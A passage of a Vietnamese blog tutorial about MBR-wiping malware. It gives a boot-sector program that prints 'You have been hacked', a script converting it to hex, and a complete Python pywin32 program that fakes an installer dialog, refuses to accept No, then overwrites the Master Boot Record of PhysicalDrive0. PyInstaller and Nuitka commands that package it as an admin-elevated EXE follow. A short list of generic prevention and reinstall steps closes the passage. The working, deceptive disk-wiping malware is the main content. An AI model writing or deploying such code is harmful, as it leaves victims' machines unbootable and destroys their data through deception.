<p>Trước tiên, nó sử dụng lệnh <code>org 0x7c00</code> để xác định địa chỉ bắt đầu của chương trình, tức là địa chỉ <code>0x7c00</code>. Tiếp đến sử dụng <code>bits 16</code> để chỉ định kiểu bit được sử dụng.</p>
<p>Sau đó, chương trình chạy đến nhãn <code>start</code> và gọi hàm <code>cls</code> để xóa màn hình và di chuyển con trỏ về địa chỉ đầu tiên của chuỗi <code>display</code> bằng cách di chuyển địa chỉ của chuỗi vào thanh ghi <code>bx</code></p>
<p>Tiếp theo, chương trình sử dụng một vòng lặp để in từng ký tự trong chuỗi <code>display</code> bằng cách gọi hàm <code>print_char</code>. Nếu ký tự là ký tự null (0), vòng lặp sẽ dừng lại và chương trình sẽ gọi hàm <code>halt</code> để kết thúc chương trình. Nếu không, con trỏ sẽ được di chuyển sang ký tự tiếp theo trong chuỗi bằng cách tăng giá trị của thanh ghi <code>bx</code> và chương trình sẽ tiếp tục in ký tự tiếp theo.</p>
<p>Hàm <code>print_char</code> sử dụng lệnh <code>int 0x10</code> để gọi dịch vụ hệ thống của BIOS để in một ký tự lên màn hình. Trong hàm này, chương trình truyền giá trị của thanh ghi <code>al</code> vào thanh ghi <code>ah</code> và sau đó gọi lệnh <code>int 0x10</code> để in ký tự lên màn hình.</p>
<p>Hàm <code>cls</code> cũng sử dụng lệnh <code>int 0x10</code> để gọi dịch vụ hệ thống của BIOS để xóa màn hình. Trong hàm này, chương trình thiết lập các thanh ghi để định dạng của việc xóa màn hình và sau đó gọi lệnh <code>int 0x10</code> để xóa màn hình.</p>
<p>Cuối cùng, chương trình kết thúc bằng hai câu lệnh với  <code>times 510 - ($ - $$) db 0</code> được sử dụng để đảm bảo rằng kích thước của chương trình sẽ là chính xác 512 byte và <code>dw 0xaa55 </code>được sử dụng để đánh dấu kí tự cuối của một sector bootable.</p>
<h4 id="ftoc-de-bien-dich-duoc-sang-ma-hex-doc-va-thuc-thi-no-minh-da-lam-nhu-sau" class="ftwp-heading"><strong>Để biên dịch được sang mã hex độc và thực thi nó mình đã làm như sau:</strong></h4>
<p>Giờ mình sẽ boot thử vào <strong>boot.bin</strong> bằng qemu binaries xem có được không nhé ! OK. Vậy là được rồi. Đầu tiên mình sẽ sử dụng NASM để biên dịch <strong>boot.asm</strong> sang <strong>boot.bin</strong> sau đó mình sẽ vào website <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Ftomeko.net%2Fonline_tools%2Ffile_to_hex.php%3Flang%3Den" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">tomeko.net</a> để chuyển file <strong>boot.bin</strong> sang mã hex độc hại tiếp đến mình chỉ vệc copy lại</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45235 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 13" width="1280" height="628" srcset="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26.png 1280w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26-300x147.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26-1024x502.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26-768x377.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26-750x368.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26-1140x559.png 1140w" sizes="auto, (max-width: 1280px) 100vw, 1280px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 16"/></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45231 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 14" width="1109" height="612" srcset="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20.png 1109w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20-300x166.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20-1024x565.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20-768x424.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20-750x414.png 750w" sizes="auto, (max-width: 1109px) 100vw, 1109px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 17"/></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45232 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 15" width="1145" height="708" srcset="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22.png 1145w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22-300x186.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22-1024x633.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22-768x475.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22-750x464.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22-1140x705.png 1140w" sizes="auto, (max-width: 1145px) 100vw, 1145px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 18"/></p>
<p>Ngoài ra bạn có thể sử dụng một đoạn script Python nhỏ của mình để chuyển file bin sang dạng mã hex nhé. Nếu bạn có tên file khác boot.bin bạn chỉ cần sửa ở dòng 3 sau đó chạy script, nó sẽ cấp cho bạn 1 đoạn mã hex giống như bên dưới</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">import binascii&#13;
&#13;
with open("boot.bin", "rb") as f:&#13;
    binary_data = f.read()&#13;
hex_values = ["0x{:02X}".format(byte) for byte in binary_data]&#13;
print(hex_values)&#13;
&#13;
hex_string = ", ".join(hex_values)&#13;
print(hex_string)&#13;
</pre>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45233 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 16" width="1111" height="615" srcset="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24.png 1111w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24-300x166.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24-1024x567.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24-768x425.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24-750x415.png 750w" sizes="auto, (max-width: 1111px) 100vw, 1111px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 19"/></p>
<h3 id="ftoc-buoc-2-dinh-kem-ma-hex-doc-va-bien-dich-sang-exe" class="ftwp-heading"><span style="font-size: 14pt; color: #008000;"><strong>Bước 2: Đính kèm mã hex độc và biên dịch sang EXE</strong></span></h3>
<p>Đầu tiên mình sẽ viết ra 1 đoạn code Python ngắn gọn với module <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fpypi.org%2Fproject%2Fpywin32%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Pywin32</a> việc cài đặt module đó cũng khá đơn giản, bạn chỉ cần mở CMD trên máy sau đó chạy đoạn lệnh <code>pip install pywin32</code>.Với module này giúp mình làm việc với các tài nguyên Windows như các tệp, thư mục, tiến trình, ứng dụng, COM objects, registry, service,…Không chỉ vậy, nó còn thực hiện các tác vụ liên quan đến Windows, bao gồm cả việc sử dụng các API của Windows thông qua các đối tượng Python. Mình sẽ gọi các module con của Pywin32 bao gồm <strong>win32file, win32api, win32gui, win32ui và win32con</strong> và import tất cả những gì của module vào. Còn module time mình dùng để “thao túng tâm lý” nạn nhân thôi :&gt;</p>
<p>Và bạn chỉ cần copy đoạn mã hex lúc nãy mà bạn đã tạo được và paste nó vào bến <strong>ma_doc</strong> như hình bên dưới</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">from win32file import * &#13;
from win32api import *  &#13;
from win32gui import *  &#13;
from win32con import *  &#13;
from win32ui import *  &#13;
from time import sleep&#13;
&#13;
ma_doc = bytes([&#13;
     # paste đoạn code dữ liệu hex tại đây&#13;
&#13;
])&#13;
</pre>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45234 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon2.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 17" width="1361" height="1595" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon2.png 1361w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-256x300.png 256w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-874x1024.png 874w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-768x900.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-1311x1536.png 1311w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-750x879.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/carbon2-1140x1336.png 1140w" sizes="auto, (max-width: 1361px) 100vw, 1361px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 20"/></p>
<p>Sau khi đã copy mã độc vào biến ma_doc, chúng ta sẽ tạo 1 hàm tên là <strong>run_mbr()</strong> bao gồm các nội dung sau:</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45236 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon3.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 18" width="1536" height="797" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon3.png 1536w, https://anonyviet.com/wp-content/uploads/2023/02/carbon3-300x156.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/carbon3-1024x531.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/carbon3-768x399.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon3-750x389.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/carbon3-1140x592.png 1140w" sizes="auto, (max-width: 1536px) 100vw, 1536px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 21"/></p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">def run_mbr():&#13;
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:&#13;
            continue&#13;
    sleep(3)&#13;
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):&#13;
        pass&#13;
&#13;
    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", &#13;
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, &#13;
                          None, OPEN_EXISTING, 0, 0)&#13;
&#13;
    WriteFile(anonyviet, ma_doc, None)&#13;
    CloseHandle(anonyviet)&#13;
&#13;
run_mbr()</pre>
<p> </p>
<p>Một vòng lặp while vô hạn được bắt đầu. Trong vòng lặp này, một hộp thoại <strong>MessageBox</strong> sẽ xuất hiện với một thông điệp yêu cầu người dùng bấm Yes hoặc No để tiếp tục cài đặt. Nếu người dùng bấm No, vòng lặp sẽ tiếp tục chạy và hộp thoại sẽ xuất hiện lại ( Và đây là kiểu ép buộc người dùng phải chọn Yes ), Nếu người dùng bấm Yes, vòng lặp sẽ kết thúc. Sau đó, chương trình sẽ dừng nghỉ trong 3 giây bằng hàm <code>sleep(3)</code> để đợi người dùng có thể đọc thông báo hoàn tất. Tiếp theo, một hộp thoại MessageBox khác xuất hiện với thông điệp yêu cầu người dùng khởi động lại máy tính để phần mềm được cập nhật. Nếu người dùng nhấn OK, chương trình sẽ tiếp tục thực thi bước tiếp theo. Với chuỗi đầu tiên trong MessageBox đó là <code>Bấm "Yes" để tiếp tục cài đặt</code> Đây là chuỗi hiện lên thông báo văn bản trên hộp thoại, tiếp đến đó là chuỗi <code>'Anonyviet'</code> đây là chuỗi hiện thị tên hộp thoại và cuối cùng đó là <code>MB_YESNO</code> đây là một phương thức gọi hộp thoại YES NO của <strong>win32gui</strong></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45237 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-1.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 19" width="1986" height="518" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon-1.png 1986w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-300x78.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-1024x267.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-768x200.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-1536x401.png 1536w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-750x196.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1-1140x297.png 1140w" sizes="auto, (max-width: 1986px) 100vw, 1986px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 22"/></p>
<p> </p>
<p>Tiếp đến là mở một tập tin được gọi là \\.\PhysicalDrive0, là tệp tương ứng với ổ đĩa vật lý đầu tiên trên hệ thống. Điều này cho phép chương trình ghi một số dữ liệu lên phần MBR (Master Boot Record) của ổ đĩa. Dòng code bên dưới tạo một file handle (một đối tượng để truy cập file) cho thiết bị ổ đĩa vật lý đầu tiên (PhysicalDrive0) bằng cách sử dụng hàm CreateFileW của Windows API. Tham số <code>GENERIC_WRITE</code> chỉ định rằng file handle này sẽ được sử dụng để ghi dữ liệu vào ổ đĩa. Tham số <code>FILE_SHARE_READ</code> và <code>FILE_SHARE_WRITE</code> cho phép các tiến trình khác có thể đọc và ghi vào thiết bị. Tham số <code>None</code> chỉ định rằng không có thuộc tính bảo mật nào được sử dụng cho file handle. Tham số <code>OPEN_EXISTING</code> chỉ định rằng file handle được tạo sẽ trỏ tới một file đã tồn tại. Tham số cuối cùng là các flag khác và ở đây được đặt là 0.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45238 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-2.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 20" width="1506" height="462" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon-2.png 1506w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-2-300x92.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-2-1024x314.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-2-768x236.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-2-750x230.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-2-1140x350.png 1140w" sizes="auto, (max-width: 1506px) 100vw, 1506px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 23"/></p>
<p> </p>
<p>với đoạn code bên dưới sử dụng hàm <code>WriteFile()</code> của Windows API để ghi dữ liệu được lưu trong biến <code>ma_doc</code> (chứa mã độc MBR) vào ổ đĩa vật lý đã được mở file handle (<code>anonyviet</code>). Tiếp đến là hàm <code>CloseHandle()</code>  hàm này đóng file handle (<code>anonyviet</code>) đã được mở trước đó. Việc đóng file handle giúp giải phóng tài nguyên và ngăn chặn việc các tiến trình khác ghi vào thiết bị.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-45239 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 21" width="832" height="432" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1.png 832w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1-300x156.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1-768x399.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1-750x389.png 750w" sizes="auto, (max-width: 832px) 100vw, 832px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 24"/></p>
<p>Nói nôm na là chương trình này yêu cầu người dùng bấm Yes để tiếp tục cài đặt, sau đó dừng nghỉ trong 3 giây và hiển thị một thông báo yêu cầu khởi động lại máy tính để cập nhật phần mềm. Sau khi người dùng khởi động lại máy tính, chương trình ghi dữ liệu vào phần MBR của ổ đĩa vật lý đầu tiên trên hệ thống. Và đó chính là mã độc MBR</p>
<p>Đây là đoạn code Python hoàn thiện:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">from win32file import * &#13;
from win32api import *  &#13;
from win32gui import *  &#13;
from win32con import *  &#13;
from win32ui import *  &#13;
from time import sleep&#13;
&#13;
&#13;
ma_doc = bytes([&#13;
     # paste đoạn code dữ liệu hex tại đây&#13;
    0xE8, 0x15, 0x00, 0xBB, 0x27, 0x7C, 0x8A, 0x07, 0x3C, 0x00, 0x74, 0x0B, 0xE8, 0x03, 0x00, 0x43, 0xEB, 0xF4, &#13;
    0xB4, 0x0E, 0xCD, 0x10, 0xC3, 0xC3, 0xB4, 0x07, 0xB0, 0x00, 0xB7, 0x02, 0xB9, 0x00, 0x00, 0xBA, 0x4F, 0x18, &#13;
    0xCD, 0x10, 0xC3, 0x57, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x41, 0x6E, 0x6F, 0x6E, 0x79, 0x76, 0x69, 0x65, &#13;
    0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2C, 0x20, 0x49, 0x20, 0x61, 0x6D, 0x20, 0x48, 0x65, 0x76, 0x69, 0x6E, 0x0D, &#13;
    0x0A, 0x59, 0x6F, 0x75, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x62, 0x65, 0x65, 0x6E, 0x20, 0x68, 0x61, 0x63, &#13;
    0x6B, 0x65, 0x64, 0x20, 0x21, 0x0D, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, &#13;
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA&#13;
])&#13;
&#13;
def run_mbr():&#13;
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:&#13;
            continue&#13;
    sleep(3)&#13;
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):&#13;
        pass&#13;
&#13;
    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", &#13;
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, &#13;
                          None, OPEN_EXISTING, 0, 0)&#13;
&#13;
    WriteFile(anonyviet, ma_doc, None)&#13;
    CloseHandle(anonyviet)&#13;
&#13;
run_mbr()</pre>
<p>Để build được file Python sang EXE ( file exe này phải chạy với quyền admin nhen ) mình sẽ sử dụng <strong>Pyinstaller</strong> hoặc là <strong>Nuitka</strong> để build ra phần mềm chứa mã độc mbr:</p>
<p><code>pyinstaller --onefile --uac-admin -w FileMaDocMBRcuaBan.py</code></p>
<p><code>nuitka --onefile --windows-uac-admin --mingw64 --disable-console FileMaDocMBRcuaBan.py</code></p>
<p><strong> Và đây là kết quả !</strong></p>
<h2 id="ftoc-cach-phong-chong-ma-doc-mbr" class="ftwp-heading"><span style="font-size: 18pt; color: #0000ff;"><strong>Cách phòng chống mã độc MBR:</strong></span></h2>
<ol>
<li>Sử dụng phần mềm diệt virus và cập nhật thường xuyên: Cài đặt phần mềm diệt virus trên máy tính của bạn và cập nhật thường xuyên để bảo vệ máy tính của bạn khỏi các mã độc MBR mới nhất.</li>
<li>Không tải xuống và cài đặt phần mềm từ các nguồn không rõ nguồn gốc: Tránh tải xuống và cài đặt phần mềm từ các trang web không rõ nguồn gốc, vì chúng có thể chứa mã độc MBR.</li>
<li>Không mở email hoặc tải xuống các tập tin từ các nguồn không rõ nguồn gốc: Mở email và tải xuống tập tin từ các nguồn không rõ nguồn gốc có thể dẫn đến sự lây lan của mã độc MBR</li>
<li>Sử dụng Firewall: Cài đặt tường lửa (Firewall) để bảo vệ máy tính của bạn khỏi các cuộc tấn công mạng.</li>
<li>Sử dụng phần mềm Anti-Rootkit: Cài đặt phần mềm Anti-Rootkit, nó sẽ giúp phát hiện và loại bỏ mã độc MBR.</li>
<li>Sử dụng mật khẩu truy cập: Sử dụng mật khẩu để bảo vệ BIOS và MBR khỏi các tấn công truy cập trái phép.</li>
<li>Không để ổ đĩa cứng trống trải: Nếu ổ đĩa cứng của bạn trống trải, các hacker có thể sử dụng để lưu trữ mã độc MBR.</li>
<li>Sử dụng phần mềm Backup: Sử dụng phần mềm Backup để sao lưu dữ liệu quan trọng và ổ đĩa cứng, nếu có bất kỳ điều gì xảy ra thì bạn có thể phục hồi lại dữ liệu của mình.</li>
</ol>
<p><span style="font-size: 18pt; color: #0000ff;"><strong>Cách giải quyết khi bị nhiễm mã độc MBR trên Windows</strong></span></p>
<p><strong>Bước 1</strong>: Tải bộ cài đặt Windows từ trang web của Microsoft. Bạn có thể tải về bản cài đặt tương ứng với phiên bản Windows bạn muốn cài đặt, ví dụ như Windows 10.</p>
<p><strong>Bước 2</strong>: Tạo một đĩa hoặc USB khởi động từ bộ cài đặt Windows bạn vừa tải về. Bạn có thể sử dụng một phần mềm tạo USB khởi động như Rufus để thực hiện việc này.</p>
<p><strong>Bước 3</strong>: Chọn thiết bị khởi động từ đĩa hoặc USB mà bạn đã tạo ở bước trên. Để làm điều này, bạn cần truy cập vào BIOS hoặc UEFI firmware và thay đổi thiết lập khởi động.</p>
<p><strong>Bước 4</strong>: Khởi động máy tính từ đĩa hoặc USB khởi động. Sau khi khởi động, bạn sẽ thấy màn hình cài đặt Windows.</p>
<p><strong>Bước 5</strong>: Làm theo các hướng dẫn trên màn hình để cài đặt Windows. Bạn có thể chọn loại cài đặt tùy chỉnh để xóa toàn bộ dữ liệu trên ổ cứng.</p>
<p><strong>Bước 6</strong>: Khi quá trình cài đặt hoàn tất, bạn cần cài đặt các trình điều khiển và các ứng dụng mà bạn sử dụng thường xuyên. Bạn có thể tải chúng từ trang web của nhà sản xuất hoặc từ Microsoft Store.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;45229&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Đánh giá bài viết post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/02/code-virus-pha-huy-mbr-o-cung.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
